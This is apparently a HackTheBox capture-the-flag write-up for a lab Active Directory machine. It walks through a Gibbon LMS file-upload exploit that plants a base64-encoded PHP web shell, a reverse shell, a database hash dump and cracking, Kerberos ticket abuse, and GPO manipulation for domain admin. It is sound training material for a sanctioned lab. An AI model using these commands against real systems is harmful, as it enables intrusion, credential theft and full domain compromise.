HackTheBox: The Frizz
Overview
The Frizz is an Active Directory environment that begins with exploiting a CVE in Gibbon LMS to execute PHP code. Enumeration of the database yields hashes, which after cracking, allow for Kerberos ticket extraction. Finally, manipulating Group Policy Objects (GPO) grants administrative privileges.
Initial Access: Gibbon LMS
The machine hosts a Gibbon LMS instance vulnerable to an authenticated RCE (CVE-2023-45878). The vulnerability lies in an insecure file upload mechanism.
We upload a PHP web shell disguised within an image payload using curl:
curl -v -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
Once uploaded, we execute a Base64 encoded PowerShell reverse shell by hitting http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=powershell -e [BASE64_PAYLOAD].
Lateral Movement: Database Extraction
With shell access, we inspect the config.php file and uncover MySQL credentials. Querying the database directly via mysql.exe exposes user hashes and salts:
.\mysql.exe -h localhost -u MrGibbonsDB -p[REDACTED] -D gibbon -e "SELECT username, passwordStrong, passwordStrongSalt FROM gibbonPerson;"
Extracted Data:
- User:
f.frizzle - Hash:
[REDACTED] - Salt:
[REDACTED]
Formatting the hash as hash:salt and cracking it with Hashcat (mode 1420 for sha256($pass.$salt)) yields the password: [REDACTED].
Authenticating via Kerberos
To authenticate via SSH to the Windows machine, we generate a Ticket Granting Ticket (TGT). Kerberos requires strict time synchronization.
- Disable local NTP and sync with the target:
sudo systemctl stop ntpsec sudo rdate -n 10.10.11.60 - Configure
/etc/krb5.conf:[libdefaults] default_realm = FRIZZ.HTB ... [realms] FRIZZ.HTB = { kdc = frizzdc.frizz.htb admin_server = frizzdc.frizz.htb default_domain = frizz.htb } - Request TGT using Impacket:
getTGT.py frizz.htb/f.frizzle - Export ticket and connect via SSH:
export KRB5CCNAME=f.frizzle.ccache ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes f.frizzle@frizz.htb
Privilege Escalation: GPO Abuse
Enumeration reveals another user, M.Schoolbus, whose password is found in a .7z file in the Recycle Bin. Logging in as M.Schoolbus shows the user holds WriteGPLink permissions over the Class_FRIZZ and DOMAIN CONTROLLERS organizational units.
We weaponize this permission by creating a malicious Group Policy Object (GPO) to add M.Schoolbus to the local Administrators group.
# Create a new GPO
New-GPO -Name "MaliciousGPO"
# Link GPO to Domain Controllers OU
New-GPLink -Name "MaliciousGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
# Inject LocalAdmin via SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName MaliciousGPO
# Force GP update
gpupdate /force
With administrative privileges granted, we use RunasCs.exe to spawn a high-integrity shell or directly read the root flag:
.\RunasCs.exe "M.SchoolBus" "[REDACTED]" "cmd /c type C:\Users\Administrator\Desktop\root.txt" --bypass-uac --logon-type '8' --force-profile
System fully compromised.